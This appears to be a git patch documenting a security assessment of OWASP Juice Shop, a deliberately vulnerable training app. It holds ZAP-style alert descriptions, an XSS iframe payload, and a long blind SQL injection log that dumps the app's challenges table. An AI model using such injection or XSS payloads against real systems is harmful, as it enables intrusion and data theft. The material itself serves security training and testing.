From f49df30ded3abe906cbd3a5e248449f82d75c743 Mon Sep 17 00:00:00 2001
From: InnoNodo

Being a web application with a vast number of intended security vulnerabilities, the OWASP Juice Shop is supposed to be the opposite of a best practice or template application for web developers: It is an awareness, training, demonstration and exercise tool for security risks in modern web applications. The OWASP Juice Shop is an open-source project hosted by the non-profit Open Worldwide Application Security Project (OWASP) and is developed and maintained by volunteers. Check out the link below for more information and documentation on the project.

For each step: result (Pass/Fail) - risk (of highest alert(s) for the step, if any).

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page: covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files. Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
https://www.w3.org/TR/CSP/
https://w3c.github.io/webappsec-csp/
https://web.dev/articles/csp
https://caniuse.com/#feat=contentsecuritypolicy
https://content-security-policy.com/

Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server. Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance). Configure the "Access-Control-Allow-Origin" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner. The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy

The page includes one or more script files from a third-party domain. Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.

A dangerous JS function seems to be in use that would leave the site vulnerable. See the references for security advice on the use of these functions.
https://v17.angular.io/guide/security

The header has now been renamed to Permissions-Policy. Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header instead of the Feature-Policy header.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy
https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/

Cross-Origin-Embedder-Policy header is a response header that prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS). Ensure that the application/web server sets the Cross-Origin-Embedder-Policy header appropriately, and that it sets the Cross-Origin-Embedder-Policy header to 'require-corp' for documents. If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Embedder-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-embedder-policy).
https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy

A timestamp was disclosed by the application/web server. - Unix. Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns. 1650485437, which evaluates to: 2022-04-20 20:10:37.
https://cwe.mitre.org/data/definitions/200.html

The response appears to contain suspicious comments which may help an attacker.

<iframe src="javascript:alert(`xss`)"> without using the frontend application at all. (This challenge is potentially harmful on Docker!)
+[11:52:28] [INFO] retrieving the length of query output
+
+[11:52:28] [INFO] retrieved: 1
+
+[11:52:28] [INFO] retrieved: 3
+[11:52:28] [INFO] retrieving the length of query output
+
+[11:52:28] [INFO] retrieved: 6
+[11:52:28] [INFO] retrieved: ______
+[11:52:28] [INFO] retrieved:
+[11:52:29] [INFO] retrieved: Docker
+[11:52:29] [INFO] retrieved: Docker
+[11:52:29] [INFO] retrieving the length of query output
+
+[11:52:29] [INFO] retrieved: 1
+
+[11:52:29] [INFO] retrieved: 1
+[11:52:29] [INFO] retrieving the length of query output
+
+[11:52:29] [INFO] retrieved: 1
+
+[11:52:29] [INFO] retrieved: 1
+[11:52:29] [INFO] retrieving the length of query output
+
+[11:52:29] [INFO] retrieved: 19
+[11:52:30] [INFO] retrieved: ___________________
+[11:52:30] [INFO] retrieved:
+[11:52:32] [INFO] retrieved: restfulXssChallenge
+[11:52:38] [INFO] retrieved: restfulXssChallenge
+[11:52:38] [INFO] retrieving the length of query output
+
+[11:52:38] [INFO] retrieved: 95
+[11:52:38] [INFO] retrieved: __________________________________
+[11:52:38] [INFO] retrieved:
+[11:52:48] [INFO] retrieved: ..pting_Prevention_Cheat_Sheet.html
+[11:52:48] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
+[11:52:48] [INFO] retrieving the length of query output
+
+[11:52:48] [INFO] retrieved: 12
+[11:52:48] [INFO] retrieved: ____________
+[11:52:48] [INFO] retrieved:
+[11:52:50] [INFO] retrieved: API-only XSS
+[11:52:50] [INFO] retrieved: API-only XSS
+[11:52:50] [INFO] retrieving the length of query output
+
+[11:52:50] [INFO] retrieved: 1
+
+[11:52:50] [INFO] retrieved: 0
+[11:52:50] [INFO] retrieving the length of query output
+
+[11:52:50] [INFO] retrieved: 33
+[11:52:50] [INFO] retrieved: _________________________________
+[11:52:50] [INFO] retrieved:
+[11:52:54] [INFO] retrieved: Danger Zone,With Coding Challenge
+[11:52:54] [INFO] retrieved: Danger Zone,With Coding Challenge
+[11:52:54] [INFO] retrieving the length of query output
+
+[11:52:54] [INFO] retrieved:
+
+[11:52:54] [INFO] retrieved:
+[11:52:54] [INFO] retrieving the length of query output
+
+[11:52:54] [INFO] retrieved: 30
+[11:52:54] [INFO] retrieved: ______________________________
+[11:52:54] [INFO] retrieved:
+[11:53:00] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00
+[11:53:00] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00
+[11:53:00] [INFO] retrieving the length of query output
+
+[11:53:00] [INFO] retrieved: 23
+[11:53:01] [INFO] retrieved: _______________________
+[11:53:01] [INFO] retrieved:
+[11:53:03] [INFO] retrieved: Sensitive Data Exposure
+[11:53:03] [INFO] retrieved: Sensitive Data Exposure
+[11:53:03] [INFO] retrieving the length of query output
+
+[11:53:03] [INFO] retrieved: 1
+
+[11:53:03] [INFO] retrieved: 0
+[11:53:03] [INFO] retrieving the length of query output
+
+[11:53:03] [INFO] retrieved: 30
+[11:53:03] [INFO] retrieved: ______________________________
+[11:53:03] [INFO] retrieved:
+[11:53:07] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00
+[11:53:07] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00
+[11:53:07] [INFO] retrieving the length of query output
+
+[11:53:07] [INFO] retrieved: 49
+[11:53:07] [INFO] retrieved: __________________________________
+[11:53:07] [INFO] retrieved:
+[11:53:12] [INFO] retrieved: ..ny access log file of the server.
+[11:53:12] [INFO] retrieved: Gain access to any access log file of the server.
+[11:53:12] [INFO] retrieving the length of query output
+
+[11:53:12] [INFO] retrieved: 1
+
+[11:53:12] [INFO] retrieved: 4
+[11:53:12] [INFO] retrieving the length of query output
+
+[11:53:12] [INFO] retrieved:
+
+[11:53:12] [INFO] retrieved:
+[11:53:13] [INFO] retrieving the length of query output
+
+[11:53:13] [INFO] retrieved: 1
+
+[11:53:13] [INFO] retrieved: 1
+[11:53:13] [INFO] retrieving the length of query output
+
+[11:53:13] [INFO] retrieved: 1
+
+[11:53:13] [INFO] retrieved: 2
+[11:53:13] [INFO] retrieving the length of query output
+
+[11:53:13] [INFO] retrieved: 28
+[11:53:13] [INFO] retrieved: ____________________________
+[11:53:13] [INFO] retrieved:
+[11:53:16] [INFO] retrieved: accessLogDisclosureChallenge
+[11:53:16] [INFO] retrieved: accessLogDisclosureChallenge
+[11:53:16] [INFO] retrieving the length of query output
+
+[11:53:16] [INFO] retrieved: 71
+[11:53:17] [INFO] retrieved: __________________________________
+[11:53:17] [INFO] retrieved:
+[11:53:24] [INFO] retrieved: ..atsheets/Logging_Cheat_Sheet.html
+[11:53:24] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html
+[11:53:24] [INFO] retrieving the length of query output
+
+[11:53:24] [INFO] retrieved: 10
+[11:53:24] [INFO] retrieved: __________
+[11:53:24] [INFO] retrieved:
+[11:53:25] [INFO] retrieved: Access Log
+[11:53:25] [INFO] retrieved: Access Log
+[11:53:25] [INFO] retrieving the length of query output
+
+[11:53:25] [INFO] retrieved: 1
+
+[11:53:25] [INFO] retrieved: 0
+[11:53:25] [INFO] retrieving the length of query output
+
+[11:53:25] [INFO] retrieved: 21
+[11:53:25] [INFO] retrieved: _____________________
+[11:53:25] [INFO] retrieved:
+[11:53:27] [INFO] retrieved: With Coding Challenge
+[11:53:27] [INFO] retrieved: With Coding Challenge
+[11:53:27] [INFO] retrieving the length of query output
+
+[11:53:27] [INFO] retrieved:
+
+[11:53:27] [INFO] retrieved:
+[11:53:28] [INFO] retrieving the length of query output
+
+[11:53:28] [INFO] retrieved: 30
+[11:53:28] [INFO] retrieved: ______________________________
+[11:53:28] [INFO] retrieved:
+[11:53:31] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00
+[11:53:31] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00
+[11:53:31] [INFO] retrieving the length of query output
+
+[11:53:31] [INFO] retrieved: 25
+[11:53:34] [INFO] retrieved: _________________________
+[11:53:34] [INFO] retrieved:
+[11:53:37] [INFO] retrieved: Improper Input Validation
+[11:53:37] [INFO] retrieved: Improper Input Validation
+[11:53:37] [INFO] retrieving the length of query output
+
+[11:53:37] [INFO] retrieved: 1
+
+[11:53:37] [INFO] retrieved: 0
+[11:53:37] [INFO] retrieving the length of query output
+
+[11:53:37] [INFO] retrieved: 30
+[11:53:37] [INFO] retrieved: ______________________________
+[11:53:37] [INFO] retrieved:
+[11:53:41] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:53:41] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:53:41] [INFO] retrieving the length of query output
+
+[11:53:41] [INFO] retrieved: 49
+[11:53:41] [INFO] retrieved: __________________________________
+[11:53:41] [INFO] retrieved:
+[11:53:46] [INFO] retrieved: ..er with administrator privileges.
+[11:53:46] [INFO] retrieved: Register as a user with administrator privileges.
+[11:53:46] [INFO] retrieving the length of query output
+
+[11:53:46] [INFO] retrieved: 1
+
+[11:53:46] [INFO] retrieved: 3
+[11:53:46] [INFO] retrieving the length of query output
+
+[11:53:46] [INFO] retrieved:
+
+[11:53:46] [INFO] retrieved:
+[11:53:47] [INFO] retrieving the length of query output
+
+[11:53:47] [INFO] retrieved: 1
+
+[11:53:47] [INFO] retrieved: 1
+[11:53:47] [INFO] retrieving the length of query output
+
+[11:53:47] [INFO] retrieved: 1
+
+[11:53:47] [INFO] retrieved: 3
+[11:53:47] [INFO] retrieving the length of query output
+
+[11:53:47] [INFO] retrieved: 22
+[11:53:47] [INFO] retrieved: ______________________
+[11:53:47] [INFO] retrieved:
+[11:53:49] [INFO] retrieved: registerAdminChallenge
+[11:53:50] [INFO] retrieved: registerAdminChallenge
+[11:53:50] [INFO] retrieving the length of query output
+
+[11:53:50] [INFO] retrieved: 79
+[11:53:50] [INFO] retrieved: __________________________________
+[11:53:50] [INFO] retrieved:
+[11:53:58] [INFO] retrieved: ../Mass_Assignment_Cheat_Sheet.html
+[11:53:58] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html
+[11:53:58] [INFO] retrieving the length of query output
+
+[11:53:58] [INFO] retrieved: 18
+[11:53:58] [INFO] retrieved: __________________
+[11:53:58] [INFO] retrieved:
+[11:54:00] [INFO] retrieved: Admin Registration
+[11:54:00] [INFO] retrieved: Admin Registration
+[11:54:00] [INFO] retrieving the length of query output
+
+[11:54:00] [INFO] retrieved: 1
+
+[11:54:00] [INFO] retrieved: 0
+[11:54:00] [INFO] retrieving the length of query output
+
+[11:54:00] [INFO] retrieved: 21
+[11:54:00] [INFO] retrieved: _____________________
+[11:54:00] [INFO] retrieved:
+[11:54:02] [INFO] retrieved: With Coding Challenge
+[11:54:02] [INFO] retrieved: With Coding Challenge
+[11:54:02] [INFO] retrieving the length of query output
+
+[11:54:02] [INFO] retrieved:
+
+[11:54:02] [INFO] retrieved:
+[11:54:03] [INFO] retrieving the length of query output
+
+[11:54:03] [INFO] retrieved: 30
+[11:54:03] [INFO] retrieved: ______________________________
+[11:54:03] [INFO] retrieved:
+[11:54:06] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:06] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:06] [INFO] retrieving the length of query output
+
+[11:54:06] [INFO] retrieved: 21
+[11:54:06] [INFO] retrieved: _____________________
+[11:54:06] [INFO] retrieved:
+[11:54:11] [INFO] retrieved: Broken Access Control
+[11:54:11] [INFO] retrieved: Broken Access Control
+[11:54:11] [INFO] retrieving the length of query output
+
+[11:54:11] [INFO] retrieved: 1
+
+[11:54:11] [INFO] retrieved: 0
+[11:54:12] [INFO] retrieving the length of query output
+
+[11:54:12] [INFO] retrieved: 30
+[11:54:12] [INFO] retrieved: ______________________________
+[11:54:12] [INFO] retrieved:
+[11:54:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:16] [INFO] retrieving the length of query output
+
+[11:54:16] [INFO] retrieved: 47
+[11:54:16] [INFO] retrieved: __________________________________
+[11:54:16] [INFO] retrieved:
+[11:54:21] [INFO] retrieved: ..inistration section of the store.
+[11:54:21] [INFO] retrieved: Access the administration section of the store.
+[11:54:21] [INFO] retrieving the length of query output
+
+[11:54:21] [INFO] retrieved: 1
+
+[11:54:21] [INFO] retrieved: 2
+[11:54:21] [INFO] retrieving the length of query output
+
+[11:54:21] [INFO] retrieved:
+
+[11:54:21] [INFO] retrieved:
+[11:54:21] [INFO] retrieving the length of query output
+
+[11:54:21] [INFO] retrieved: 1
+
+[11:54:21] [INFO] retrieved: 1
+[11:54:21] [INFO] retrieving the length of query output
+
+[11:54:21] [INFO] retrieved: 1
+
+[11:54:21] [INFO] retrieved: 4
+[11:54:22] [INFO] retrieving the length of query output
+
+[11:54:22] [INFO] retrieved: 21
+[11:54:22] [INFO] retrieved: _____________________
+[11:54:22] [INFO] retrieved:
+[11:54:24] [INFO] retrieved: adminSectionChallenge
+[11:54:24] [INFO] retrieved: adminSectionChallenge
+[11:54:24] [INFO] retrieving the length of query output
+
+[11:54:24] [INFO] retrieved: 77
+[11:54:24] [INFO] retrieved: __________________________________
+[11:54:24] [INFO] retrieved:
+[11:54:32] [INFO] retrieved: ..ts/Authorization_Cheat_Sheet.html
+[11:54:32] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Cheat_Sheet.html
+[11:54:32] [INFO] retrieving the length of query output
+
+[11:54:32] [INFO] retrieved: 13
+[11:54:32] [INFO] retrieved: _____________
+[11:54:32] [INFO] retrieved:
+[11:54:33] [INFO] retrieved: Admin Section
+[11:54:33] [INFO] retrieved: Admin Section
+[11:54:33] [INFO] retrieving the length of query output
+
+[11:54:33] [INFO] retrieved: 1
+
+[11:54:34] [INFO] retrieved: 0
+[11:54:34] [INFO] retrieving the length of query output
+
+[11:54:34] [INFO] retrieved: 36
+[11:54:34] [INFO] retrieved: __________________________________
+[11:54:34] [INFO] retrieved:
+[11:54:37] [INFO] retrieved: ..d for Demos,With Coding Challenge
+[11:54:38] [INFO] retrieved: Good for Demos,With Coding Challenge
+[11:54:38] [INFO] retrieving the length of query output
+
+[11:54:38] [INFO] retrieved: 1
+
+[11:54:38] [INFO] retrieved: 8
+[11:54:38] [INFO] retrieving the length of query output
+
+[11:54:38] [INFO] retrieved: 30
+[11:54:38] [INFO] retrieved: ______________________________
+[11:54:38] [INFO] retrieved:
+[11:54:42] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:45] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:45] [INFO] retrieving the length of query output
+
+[11:54:45] [INFO] retrieved: 21
+[11:54:45] [INFO] retrieved: _____________________
+[11:54:45] [INFO] retrieved:
+[11:54:47] [INFO] retrieved: Vulnerable Components
+[11:54:47] [INFO] retrieved: Vulnerable Components
+[11:54:47] [INFO] retrieving the length of query output
+
+[11:54:47] [INFO] retrieved: 1
+
+[11:54:47] [INFO] retrieved: 0
+[11:54:47] [INFO] retrieving the length of query output
+
+[11:54:47] [INFO] retrieved: 30
+[11:54:47] [INFO] retrieved: ______________________________
+[11:54:47] [INFO] retrieved:
+[11:54:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:54:51] [INFO] retrieving the length of query output
+
+[11:54:51] [INFO] retrieved: 142
+[11:54:51] [INFO] retrieved: __________________________________
+[11:54:51] [INFO] retrieved:
+[11:55:06] [INFO] retrieved: ..harmful on Docker!)
+[11:55:06] [INFO] retrieved: Overwrite the Legal Information file. (This challenge is potentially harmful on Docker!)
+[11:55:06] [INFO] retrieving the length of query output
+
+[11:55:06] [INFO] retrieved: 1
+
+[11:55:06] [INFO] retrieved: 6
+[11:55:06] [INFO] retrieving the length of query output
+
+[11:55:06] [INFO] retrieved: 6
+[11:55:06] [INFO] retrieved: ______
+[11:55:06] [INFO] retrieved:
+[11:55:07] [INFO] retrieved: Docker
+[11:55:07] [INFO] retrieved: Docker
+[11:55:07] [INFO] retrieving the length of query output
+
+[11:55:07] [INFO] retrieved: 1
+
+[11:55:07] [INFO] retrieved: 0
+[11:55:07] [INFO] retrieving the length of query output
+
+[11:55:07] [INFO] retrieved: 1
+
+[11:55:07] [INFO] retrieved: 5
+[11:55:07] [INFO] retrieving the length of query output
+
+[11:55:07] [INFO] retrieved: 18
+[11:55:08] [INFO] retrieved: __________________
+[11:55:08] [INFO] retrieved:
+[11:55:09] [INFO] retrieved: fileWriteChallenge
+[11:55:10] [INFO] retrieved: fileWriteChallenge
+[11:55:10] [INFO] retrieving the length of query output
+
+[11:55:10] [INFO] retrieved: 96
+[11:55:10] [INFO] retrieved: __________________________________
+[11:55:10] [INFO] retrieved:
+[11:55:23] [INFO] retrieved: ..dency_Management_Cheat_Sheet.html
+[11:55:23] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html
+[11:55:23] [INFO] retrieving the length of query output
+
+[11:55:23] [INFO] retrieved: 20
+[11:55:23] [INFO] retrieved: ____________________
+[11:55:23] [INFO] retrieved:
+[11:55:25] [INFO] retrieved: Arbitrary File Write
+[11:55:25] [INFO] retrieved: Arbitrary File Write
+[11:55:25] [INFO] retrieving the length of query output
+
+[11:55:25] [INFO] retrieved: 1
+
+[11:55:25] [INFO] retrieved: 0
+[11:55:25] [INFO] retrieving the length of query output
+
+[11:55:25] [INFO] retrieved: 24
+[11:55:26] [INFO] retrieved: ________________________
+[11:55:26] [INFO] retrieved:
+[11:55:28] [INFO] retrieved: Danger Zone,Prerequisite
+[11:55:28] [INFO] retrieved: Danger Zone,Prerequisite
+[11:55:28] [INFO] retrieving the length of query output
+
+[11:55:28] [INFO] retrieved:
+
+[11:55:28] [INFO] retrieved:
+[11:55:28] [INFO] retrieving the length of query output
+
+[11:55:28] [INFO] retrieved: 30
+[11:55:29] [INFO] retrieved: ______________________________
+[11:55:29] [INFO] retrieved:
+[11:55:32] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:55:32] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:55:32] [INFO] retrieving the length of query output
+
+[11:55:32] [INFO] retrieved: 21
+[11:55:32] [INFO] retrieved: _____________________
+[11:55:32] [INFO] retrieved:
+[11:55:34] [INFO] retrieved: Broken Authentication
+[11:55:34] [INFO] retrieved: Broken Authentication
+[11:55:34] [INFO] retrieving the length of query output
+
+[11:55:34] [INFO] retrieved: 1
+
+[11:55:35] [INFO] retrieved: 0
+[11:55:35] [INFO] retrieving the length of query output
+
+[11:55:35] [INFO] retrieved: 30
+[11:55:35] [INFO] retrieved: ______________________________
+[11:55:35] [INFO] retrieved:
+[11:55:38] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:55:38] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:55:38] [INFO] retrieving the length of query output
+
+[11:55:38] [INFO] retrieved: 169
+[11:55:38] [INFO] retrieved: __________________________________
+[11:55:38] [INFO] retrieved:
+[11:55:59] [INFO] retrieved: ..wer to his security question.
+[11:55:59] [INFO] retrieved: Reset the password of Bjoern's OWASP account via the Forgot Password mechanism with the original answer to his security question.
+[11:55:59] [INFO] retrieving the length of query output
+
+[11:55:59] [INFO] retrieved: 1
+
+[11:55:59] [INFO] retrieved: 3
+[11:55:59] [INFO] retrieving the length of query output
+
+[11:55:59] [INFO] retrieved:
+
+[11:55:59] [INFO] retrieved:
+[11:56:00] [INFO] retrieving the length of query output
+
+[11:56:00] [INFO] retrieved: 1
+
+[11:56:00] [INFO] retrieved: 1
+[11:56:00] [INFO] retrieving the length of query output
+
+[11:56:00] [INFO] retrieved: 1
+
+[11:56:00] [INFO] retrieved: 6
+[11:56:00] [INFO] retrieving the length of query output
+
+[11:56:00] [INFO] retrieved: 33
+[11:56:00] [INFO] retrieved: _________________________________
+[11:56:00] [INFO] retrieved:
+[11:56:04] [INFO] retrieved: resetPasswordBjoernOwaspChallenge
+[11:56:04] [INFO] retrieved: resetPasswordBjoernOwaspChallenge
+[11:56:04] [INFO] retrieving the length of query output
+
+[11:56:04] [INFO] retrieved: 101
+[11:56:04] [INFO] retrieved: __________________________________
+[11:56:04] [INFO] retrieved:
+[11:56:15] [INFO] retrieved: ..curity_Questions_Cheat_Sheet.html
+[11:56:15] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html
+[11:56:15] [INFO] retrieving the length of query output
+
+[11:56:15] [INFO] retrieved: 21
+[11:56:15] [INFO] retrieved: _____________________
+[11:56:15] [INFO] retrieved:
+[11:56:17] [INFO] retrieved: Bjoern's Favorite Pet
+[11:56:17] [INFO] retrieved: Bjoern's Favorite Pet
+[11:56:17] [INFO] retrieving the length of query output
+
+[11:56:17] [INFO] retrieved: 1
+
+[11:56:17] [INFO] retrieved: 0
+[11:56:17] [INFO] retrieving the length of query output
+
+[11:56:17] [INFO] retrieved: 27
+[11:56:18] [INFO] retrieved: ___________________________
+[11:56:18] [INFO] retrieved:
+[11:56:20] [INFO] retrieved: OSINT,With Coding Challenge
+[11:56:20] [INFO] retrieved: OSINT,With Coding Challenge
+[11:56:20] [INFO] retrieving the length of query output
+
+[11:56:20] [INFO] retrieved:
+
+[11:56:20] [INFO] retrieved:
+[11:56:21] [INFO] retrieving the length of query output
+
+[11:56:21] [INFO] retrieved: 30
+[11:56:21] [INFO] retrieved: ______________________________
+[11:56:21] [INFO] retrieved:
+[11:56:24] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:56:24] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:56:24] [INFO] retrieving the length of query output
+
+[11:56:24] [INFO] retrieved: 26
+[11:56:24] [INFO] retrieved: __________________________
+[11:56:24] [INFO] retrieved:
+[11:56:27] [INFO] retrieved: Security through Obscurity
+[11:56:27] [INFO] retrieved: Security through Obscurity
+[11:56:27] [INFO] retrieving the length of query output
+
+[11:56:27] [INFO] retrieved: 1
+
+[11:56:27] [INFO] retrieved: 0
+[11:56:30] [INFO] retrieving the length of query output
+
+[11:56:30] [INFO] retrieved: 30
+[11:56:30] [INFO] retrieved: ______________________________
+[11:56:30] [INFO] retrieved:
+[11:56:34] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:56:34] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:56:34] [INFO] retrieving the length of query output
+
+[11:56:34] [INFO] retrieved: 60
+[11:56:34] [INFO] retrieved: __________________________________
+[11:56:34] [INFO] retrieved:
+[11:56:40] [INFO] retrieved: ..before its official announcement.
+[11:56:40] [INFO] retrieved: Learn about the Token Sale before its official announcement.
+[11:56:40] [INFO] retrieving the length of query output
+
+[11:56:40] [INFO] retrieved: 1
+
+[11:56:40] [INFO] retrieved: 5
+[11:56:40] [INFO] retrieving the length of query output
+
+[11:56:40] [INFO] retrieved:
+
+[11:56:40] [INFO] retrieved:
+[11:56:40] [INFO] retrieving the length of query output
+
+[11:56:40] [INFO] retrieved: 1
+
+[11:56:40] [INFO] retrieved: 1
+[11:56:41] [INFO] retrieving the length of query output
+
+[11:56:41] [INFO] retrieved: 1
+
+[11:56:41] [INFO] retrieved: 7
+[11:56:41] [INFO] retrieving the length of query output
+
+[11:56:41] [INFO] retrieved: 18
+[11:56:41] [INFO] retrieved: __________________
+[11:56:41] [INFO] retrieved:
+[11:56:43] [INFO] retrieved: tokenSaleChallenge
+[11:56:43] [INFO] retrieved: tokenSaleChallenge
+[11:56:43] [INFO] retrieving the length of query output
+
+[11:56:43] [INFO] retrieved:
+
+[11:56:43] [INFO] retrieved:
+[11:56:43] [INFO] retrieving the length of query output
+
+[11:56:43] [INFO] retrieved: 15
+[11:56:43] [INFO] retrieved: _______________
+[11:56:43] [INFO] retrieved:
+[11:56:45] [INFO] retrieved: Blockchain Hype
+[11:56:45] [INFO] retrieved: Blockchain Hype
+[11:56:45] [INFO] retrieving the length of query output
+
+[11:56:45] [INFO] retrieved: 1
+
+[11:56:45] [INFO] retrieved: 0
+[11:56:45] [INFO] retrieving the length of query output
+
+[11:56:45] [INFO] retrieved: 52
+[11:56:46] [INFO] retrieved: __________________________________
+[11:56:46] [INFO] retrieved:
+[11:56:51] [INFO] retrieved: ..alysis,Web3,With Coding Challenge
+[11:56:51] [INFO] retrieved: Contraption,Code Analysis,Web3,With Coding Challenge
+[11:56:51] [INFO] retrieving the length of query output
+
+[11:56:51] [INFO] retrieved:
+
+[11:56:51] [INFO] retrieved:
+[11:56:51] [INFO] retrieving the length of query output
+
+[11:56:51] [INFO] retrieved: 30
+[11:56:51] [INFO] retrieved: ______________________________
+[11:56:51] [INFO] retrieved:
+[11:56:55] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:56:55] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:56:55] [INFO] retrieving the length of query output
+
+[11:56:55] [INFO] retrieved: 23
+[11:56:55] [INFO] retrieved: _______________________
+[11:56:55] [INFO] retrieved:
+[11:56:57] [INFO] retrieved: Sensitive Data Exposure
+[11:56:57] [INFO] retrieved: Sensitive Data Exposure
+[11:56:57] [INFO] retrieving the length of query output
+
+[11:56:57] [INFO] retrieved: 1
+
+[11:56:57] [INFO] retrieved: 0
+[11:56:57] [INFO] retrieving the length of query output
+
+[11:56:57] [INFO] retrieved: 30
+[11:56:58] [INFO] retrieved: ______________________________
+[11:56:58] [INFO] retrieved:
+[11:57:01] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:57:01] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:57:01] [INFO] retrieving the length of query output
+
+[11:57:01] [INFO] retrieved: 68
+[11:57:01] [INFO] retrieved: __________________________________
+[11:57:01] [INFO] retrieved:
+[11:57:11] [INFO] retrieved: .. official Soul Bound Token (NFT).
+[11:57:11] [INFO] retrieved: Take over the wallet containing our official Soul Bound Token (NFT).
+[11:57:11] [INFO] retrieving the length of query output
+
+[11:57:11] [INFO] retrieved: 1
+
+[11:57:11] [INFO] retrieved: 2
+[11:57:12] [INFO] retrieving the length of query output
+
+[11:57:12] [INFO] retrieved:
+
+[11:57:12] [INFO] retrieved:
+[11:57:12] [INFO] retrieving the length of query output
+
+[11:57:12] [INFO] retrieved: 1
+
+[11:57:12] [INFO] retrieved: 1
+[11:57:12] [INFO] retrieving the length of query output
+
+[11:57:12] [INFO] retrieved: 1
+
+[11:57:12] [INFO] retrieved: 8
+[11:57:12] [INFO] retrieving the length of query output
+
+[11:57:12] [INFO] retrieved: 18
+[11:57:12] [INFO] retrieved: __________________
+[11:57:12] [INFO] retrieved:
+[11:57:15] [INFO] retrieved: nftUnlockChallenge
+[11:57:15] [INFO] retrieved: nftUnlockChallenge
+[11:57:15] [INFO] retrieving the length of query output
+
+[11:57:15] [INFO] retrieved:
+
+[11:57:15] [INFO] retrieved:
+[11:57:15] [INFO] retrieving the length of query output
+
+[11:57:15] [INFO] retrieved: 12
+[11:57:15] [INFO] retrieved: ____________
+[11:57:15] [INFO] retrieved:
+[11:57:17] [INFO] retrieved: NFT Takeover
+[11:57:17] [INFO] retrieved: NFT Takeover
+[11:57:17] [INFO] retrieving the length of query output
+
+[11:57:17] [INFO] retrieved: 1
+
+[11:57:17] [INFO] retrieved: 0
+[11:57:17] [INFO] retrieving the length of query output
+
+[11:57:17] [INFO] retrieved: 53
+[11:57:17] [INFO] retrieved: __________________________________
+[11:57:17] [INFO] retrieved:
+[11:57:23] [INFO] retrieved: .. Demos,Web3,With Coding Challenge
+[11:57:23] [INFO] retrieved: Contraption,Good for Demos,Web3,With Coding Challenge
+[11:57:23] [INFO] retrieving the length of query output
+
+[11:57:23] [INFO] retrieved:
+
+[11:57:23] [INFO] retrieved:
+[11:57:23] [INFO] retrieving the length of query output
+
+[11:57:23] [INFO] retrieved: 30
+[11:57:23] [INFO] retrieved: ______________________________
+[11:57:23] [INFO] retrieved:
+[11:57:26] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
